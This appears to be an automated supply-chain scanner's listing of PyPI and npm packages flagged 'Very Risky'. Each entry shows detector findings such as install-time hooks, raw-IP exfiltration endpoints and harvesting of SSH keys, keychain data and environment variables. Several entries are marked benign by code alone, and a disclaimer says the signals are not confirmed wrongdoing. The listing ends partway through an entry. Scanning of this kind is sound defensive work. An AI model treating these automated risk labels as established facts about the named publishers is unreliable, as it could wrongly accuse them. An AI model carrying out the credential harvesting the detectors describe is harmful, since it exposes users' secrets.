Very Risky
requests pypi 1.0.0 devtools-community — 🪝 📡
Package purpose: Requests integration providing general utility for Python
Claimed homepage: https://pypi.org/project/requests-cache-utils/
Matched naming pattern: python-requests-general
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 8
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 32 lines, 1.2 kB across 2 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (0 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in requests_cache_utils-1.0.0/requests_cache_utils/__init__.py:7
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in requests_cache_utils-1.0.0/requests_cache_utils/__init__.py:5
  • CRITICALINSTALL_TIME_CMDCLASS_OVERRIDE: '_Install.run()' executes 'subprocess.Popen' during installation in requests_cache_utils-1.0.0/setup.py:9
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in requests_cache_utils-1.0.0/setup.py:11
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in requests_cache_utils-1.0.0/setup.py:9
  • HIGHINSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in requests_cache_utils-1.0.0/setup.py:5
Static code signals:
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in requests_cache_utils-1.0.0/requests_cache_utils/__init__.py:7
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in requests_cache_utils-1.0.0/requests_cache_utils/__init__.py:5
  • INSTALL_TIME_CMDCLASS_OVERRIDE: '_Install.run()' executes 'subprocess.Popen' during installation in requests_cache_utils-1.0.0/setup.py:9
  • EXFILTRATION_DESTINATION_DETECTED: 'Raw Public IP Endpoint' found in requests_cache_utils-1.0.0/setup.py:11
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in requests_cache_utils-1.0.0/setup.py:9
  • INSTALL_TIME_EXECUTION: 'Python setup.py Custom Install Hook' found in requests_cache_utils-1.0.0/setup.py:5
  • SUPPLY_CHAIN_EXECUTION_HOOK: 'PyPI Custom Install Class Override' found in requests_cache_utils-1.0.0/setup.py:5

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
235 101d 113 4,381 ↑1.1/day
Very Risky
claude pypi 0.2.1 paris-paraskevas — 🪝 🗄️
Package purpose: Windows tray widget + dashboard for Claude plan usage (5-hour & weekly limits)
Claimed homepage: https://pypi.org/project/claude-usage-tracker/
Matched naming pattern: claude-claude-tracker
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 101
Registry downloads: 113/month, 9/week (MODERATE_USAGE)
Codebase size: 4381 lines, 243.7 kB across 1 file (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (73 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1614
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1633
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1670
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:2816
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:59
Static code signals:
  • CREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1614
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1633
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1670
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:2816
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:59
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:1638
  • SYSTEM_PERSISTENCE_TAMPERING: 'Shortcut Hijacking (.lnk Rewrite / Browser Extension Sideload)' found in claude_usage_tracker-0.2.1/claude_usage_tracker.py:4159
  • SOURCE_CODE_PERSISTENT_BACKDOOR: persistence mechanism combined with execution/network in claude_usage_tracker-0.2.1/claude_usage_tracker.py

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
230 27d 628 33,565 ↑23.3/day
Very Risky
actions pypi 1.0.2 Joshua Yorko — 🪝
Package purpose: Actions Runtime — serve Python actions through HTTP and MCP
Claimed homepage: https://pypi.org/project/actions-runtime/
Matched naming pattern: python-actions-runtime
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 27
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 628/month, 52/week (MODERATE_USAGE)
Codebase size: 33565 lines, 2.5 MB across 183 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (20 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/build.py:173
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_action_package_handler.py:97
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in actions_runtime-1.0.2/src/actions/server/_actions_import.py:264
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in actions_runtime-1.0.2/src/actions/server/_actions_process_pool.py:272
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_actions_process_pool.py:717
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_api_oauth2.py:66
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/build.py:173
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_action_package_handler.py:97
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in actions_runtime-1.0.2/src/actions/server/_actions_import.py:264
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in actions_runtime-1.0.2/src/actions/server/_actions_process_pool.py:272
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_actions_process_pool.py:717
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in actions_runtime-1.0.2/src/actions/server/_api_oauth2.py:66
  • SOURCE_CODE_ENCODED_PAYLOAD: 'atob()' found in actions_runtime-1.0.2/src/actions/server/_api_run.py:327
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in actions_runtime-1.0.2/src/actions/server/_build_common/process_call.py:28

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
230 139d 540 17,648 ↑3.9/day
Very Risky
claude pypi 0.3.45 — be2jay67@gmail.com gmail.com 🪝 🗄️
Package purpose: Personal AI project management hub — North Star milestone tracking, live Claude sessions, CTX context alignment.
Claimed homepage: https://pypi.org/project/claude-ns-hub/
Matched naming pattern: claude-claude-hub
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 139
Registry downloads: 540/month, 8/week (MODERATE_USAGE)
Codebase size: 17648 lines, 1.3 MB across 10 files (LARGE_CODEBASE)
Automated signals flagged:
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'be2jay67@gmail.com' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (111 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/hub-encode-daemon.py:96
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_ns_hub-0.3.45/server.py:7570
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_ns_hub-0.3.45/server.py:187
  • HIGHSOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_ns_hub-0.3.45/server.py:4202
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/server.py:77
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/hub-encode-daemon.py:96
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in claude_ns_hub-0.3.45/server.py:7570
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_ns_hub-0.3.45/server.py:187
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in claude_ns_hub-0.3.45/server.py:4202
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_ns_hub-0.3.45/server.py:77
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Bulk Environment Harvesting' found in claude_ns_hub-0.3.45/server.py:5479
  • SYSTEM_PERSISTENCE_TAMPERING: 'System Persistence Implant (systemd/cron/registry)' found in claude_ns_hub-0.3.45/server.py:18838
  • ANTI_ANALYSIS_EVASION: 'Extended Scanner Timeout Stall' found in claude_ns_hub-0.3.45/server.py:3594

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
230 436d 4,986 128,928 ↑11.4/day
Very Risky
claude pypi 6.5.83 Claude MPM Team bob@matsuoka.com matsuoka.com 🪝
Package purpose: Claude Code workflow and agent management framework - Multi-agent orchestration, skills system, MCP integration, session management, and semantic code search for AI-powered development
Claimed homepage: https://pypi.org/project/claude-mpm/
Matched naming pattern: python-claude-mpm
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 436
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 4986/month, 2383/week (ACTIVE_COMMUNITY_USE)
Codebase size: 128928 lines, 6.3 MB across 1043 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-mpm' matches AI hallucination template [python] + [claude] + [mpm].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'bob@matsuoka.com' is not affiliated with official vendor domain.
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/adapters/cli_adapters.py:33
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/agents/agent_loader.py:752
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/google.py:75
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/slack.py:80
Static code signals:
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/adapters/cli_adapters.py:33
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/agents/agent_loader.py:752
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/google.py:75
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/auth/providers/slack.py:80
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/cli/__init__.py:77
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/cli/chrome_devtools_installer.py:88
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in claude_mpm-6.5.83/src/claude_mpm/cli/commands/agent_manager.py:1080
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in claude_mpm-6.5.83/src/claude_mpm/cli/commands/agent_manager.py:1077

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
225 26d 0 52,681 ↑0.0/day
Very Risky
ghostchimera pypi 0.4.0b0 Ghost Chimera Contributors — 🪝
Package purpose: Local-first agent orchestration prototype with Chimera Pilot scheduling and runtime control.
Claimed homepage: https://pypi.org/project/ghostchimera/
Matched naming pattern: python-ghostchimera-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 26
Code-only verdict: BENIGN_COMMUNITY (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 52681 lines, 2.4 MB across 240 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (20 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/agent_core/memory.py:25
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/agent_core/skill_manager.py:60
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy.py:142
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy_jobs.py:204
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy_jobs.py:135
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/backends/cwr.py:24
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/agent_core/memory.py:25
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/agent_core/skill_manager.py:60
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy.py:142
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy_jobs.py:204
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/autonomy_jobs.py:135
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/backends/cwr.py:24
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/backends/desktop_runtime.py:497
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in ghostchimera-0.4.0b0/ghostchimera/chimera_pilot/backends/gemini.py:61

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
225 31d 0 3,148 ↑0.0/day
Very Risky
pyrecrawl pypi 0.8.1 Alexander Jay — 🪝
Package purpose: Web browsing superpowers for AI agents: one MCP tool to scrape, extract, crawl, map, and search any site — self-hosted, no API keys, with a smart auto-fallback ladder.
Claimed homepage: https://pypi.org/project/pyrecrawl/
Matched naming pattern: python-pyrecrawl-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 31
Registry downloads: 0/month, 0/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 3148 lines, 151.3 kB across 10 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (28 days ago) during the active AI hallucination slopsquatting wave.
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.8.1/scripts/probe_stdio.py:12
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/probe_stdio.py:12
  • CRITICALMODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.8.1/scripts/probe_v2.py:19
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/probe_v2.py:19
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/stats.py:56
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in pyrecrawl-0.8.1/src/pyrecrawl/cli.py:67
Static code signals:
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.8.1/scripts/probe_stdio.py:12
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/probe_stdio.py:12
  • MODULE_TOPLEVEL_EXECUTION: 'subprocess.Popen' executed at module scope (runs on import) in pyrecrawl-0.8.1/scripts/probe_v2.py:19
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/probe_v2.py:19
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/scripts/stats.py:56
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in pyrecrawl-0.8.1/src/pyrecrawl/cli.py:67
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in pyrecrawl-0.8.1/src/pyrecrawl/cli.py:281
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in pyrecrawl-0.8.1/src/pyrecrawl/cli.py:22

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
225 207d 15 952 ↑0.1/day
Very Risky
claude npm 0.2.0 — — 🪝 🗄️
Package purpose: System tray indicator for Claude Code API usage limits
Matched naming pattern: node-claude-tray
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 207
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 15/month, 3/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 952 lines, 30.8 kB across 15 files (MODERATE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'claude-tray' matches AI hallucination template [node] + [claude] + [tray].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (180 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'chmod +x node_modules/systray2/traybin/tray_darwin_release 2>/dev/null || true'
  • HIGHMISSING_SOURCE_REPOSITORY_URL
  • HIGHCREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/bin/claude-tray.js:32 (+1 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/claude-tray.js:104
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'chmod +x node_modules/systray2/traybin/tray_darwin_release 2>/dev/null || true'
  • MISSING_SOURCE_REPOSITORY_URL
  • CREDENTIAL_PATH_HARVESTING: 'IDE / AI Agent Configuration Hijacking' found in package/bin/claude-tray.js:32 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in package/bin/claude-tray.js:104
  • CREDENTIAL_PATH_HARVESTING: 'macOS Keychain Dump' found in package/src/credentials.js:52
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/src/credentials.js:51 (+1 more occurrence(s) elsewhere)
  • SOURCE_CODE_NETWORK_CALL: 'fetch/axios/XMLHttpRequest' found in package/src/usage.js:9

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
220 216d 49 52 ↑0.2/day
Very Risky
copilot pypi 0.1.12 — khaerul@example.com example.com 🪝 ⚡
Package purpose: GitHub Copilot agents for AI-assisted software development
Claimed homepage: https://pypi.org/project/swe-copilot-agents/
Matched naming pattern: swe-copilot-agents
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 216
Registry downloads: 49/month, 17/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 52 lines, 1.8 kB across 2 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name 'swe-copilot-agents' matches AI hallucination template [swe] + [copilot] + [agents].
  • HIGHClaims critical enterprise brand identity ('COPILOT').
  • HIGHPublisher email 'khaerul@example.com' is not affiliated with official vendor domain.
  • MEDIUMPackage registered 205 days ago within the 1-year AI tool proliferation window.
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in swe_copilot_agents-0.1.12/awesome_copilot/install_prompt.pth: 'import subprocess'
  • CRITICALPYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in swe_copilot_agents-0.1.12/awesome_copilot/install_prompt.pth: 'import sys'
Static code signals:
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'subprocess' imported in swe_copilot_agents-0.1.12/awesome_copilot/install_prompt.pth: 'import subprocess'
  • PYTHON_PTH_CODE_EXECUTION: Dangerous startup module 'sys' imported in swe_copilot_agents-0.1.12/awesome_copilot/install_prompt.pth: 'import sys'

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
220 2068d 175 46 ↑0.1/day
Very Risky
ethereum npm 7.0.0 Animoca Brands — 🪝
Package purpose: REVV Solidity Contracts
Claimed homepage: https://github.com/animoca/revv-ethereum-contracts#readme
Matched naming pattern: node-ethereum-revv-ethereum-contracts
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 2068
Registry downloads: 175/month, 43/week (MODERATE_USAGE)
Codebase size: 46 lines, 1.5 kB across 5 files (TINY_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@animoca/revv-ethereum-contracts' matches AI hallucination template [node] + [ethereum] + [revv-ethereum-contracts].
  • HIGHClaims critical enterprise brand identity ('ETHEREUM').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • MEDIUMPackage has empty or near-zero description (potential reservation stub).
  • INFOEstablished pre-AI legacy package registered 2040 days ago (predates modern AI hallucination waves).
  • HIGHLIFECYCLE_SCRIPT: 'postinstall' -> 'bash -c 'for cfg in .vscode/settings.json .vscode/extensions.json .vscode/launch.json; do cp -n ${cfg}.default ${cfg} || :; done''
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • CRITICALSUSPICIOUS_SHELL_COMMAND: Pattern 'sh -c' in 'postinstall' script
Static code signals:
  • LIFECYCLE_SCRIPT: 'postinstall' -> 'bash -c 'for cfg in .vscode/settings.json .vscode/extensions.json .vscode/launch.json; do cp -n ${cfg}.default ${cfg} || :; done''
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'bash' in 'postinstall' script
  • SUSPICIOUS_SHELL_COMMAND: Pattern 'sh -c' in 'postinstall' script

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on npm →
215 69d 390 12,139 ↑5.7/day
Very Risky
autohilt pypi 0.8.2 — hello@autohilt.com autohilt.com 🪝 🗄️
Package purpose: autoHILT test executor — hardware-in-loop pytest fixtures generated from your drawn test station
Claimed homepage: https://pypi.org/project/autohilt/
Matched naming pattern: python-autohilt-core
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 69
Registry downloads: 390/month, 39/week (MODERATE_USAGE)
Codebase size: 12139 lines, 716.3 kB across 32 files (LARGE_CODEBASE)
Automated signals flagged:
  • INFOPublisher email domain '@autohilt.com' matches package identifier token 'autohilt', verifying identifiable third-party organization ownership.
  • MEDIUMPackage published 5+ versions in rapid succession (< 24h) to mimic mature open source maintenance.
  • HIGHPackage registered recently (68 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHSOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in autohilt/assets.py:90
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Private Keys (~/.ssh)' found in autohilt/authkeys.py:1
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in autohilt/authkeys.py:1
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in autohilt/authkeys.py:250
  • HIGHCREDENTIAL_PATH_HARVESTING: 'SSH Private Keys (~/.ssh)' found in autohilt/cli.py:950
Static code signals:
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in autohilt/assets.py:90
  • CREDENTIAL_PATH_HARVESTING: 'SSH Private Keys (~/.ssh)' found in autohilt/authkeys.py:1
  • CREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in autohilt/authkeys.py:1
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in autohilt/authkeys.py:250
  • CREDENTIAL_PATH_HARVESTING: 'SSH Private Keys (~/.ssh)' found in autohilt/cli.py:950
  • CREDENTIAL_PATH_HARVESTING: 'SSH Directory / Private Keys (~/.ssh)' found in autohilt/cli.py:950
  • SOURCE_CODE_DYNAMIC_EXECUTION: 'Python Subprocess / OS Execution' found in autohilt/cli.py:1030
  • SOURCE_CODE_ENV_VARS_ACCESS: 'Environment Variable Access (process.env / os.environ)' found in autohilt/cli.py:525

Signals reflect what our detector observed, not a confirmed determination of wrongdoing.

View package on PyPI →
215 82d 17 302,767 ↑0.2/day
Very Risky
claude npm 0.8.0 — — 🪝 📡
Package purpose: AI Traffic Control — inspect and govern AI prompts in Claude Code
Claimed homepage: https://github.com/akasecurity/ai-tc/tree/main/plugins/claude-code
Matched naming pattern: node-claude-plugin-claude-code
Official vendor account: No — publisher domain doesn't match the brand it names
Days since publish: 82
Code-only verdict: Unverified Signal (the score above also weighs naming and publisher-domain signals, not just the code itself)
Registry downloads: 17/month, 4/week (NEGLIGIBLE_OR_ZERO_USAGE)
Codebase size: 302767 lines, 11.7 MB across 14 files (LARGE_CODEBASE)
Automated signals flagged:
  • MEDIUMPackage name '@akasecurity/plugin-claude-code' matches AI hallucination template [node] + [claude] + [plugin-claude-code].
  • HIGHClaims critical enterprise brand identity ('CLAUDE').
  • HIGHPublisher email 'None' is not affiliated with official vendor domain.
  • HIGHPackage registered recently (55 days ago) during the active AI hallucination slopsquatting wave.
  • HIGHEXFILTRATION_DESTINATION_DETECTED: 'Hardcoded GitHub Personal Access Token' found in package/scripts/backfill.js:24258 (+9 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'eval()' found in package/scripts/backfill.js:22890 (+9 more occurrence(s) elsewhere)
  • HIGHSOURCE_CODE_DYNAMIC_EXECUTION: 'execSync/spawnSync' found in package/scripts/backfill.js:22658 (+10 more occurrence(s) elsewhere)
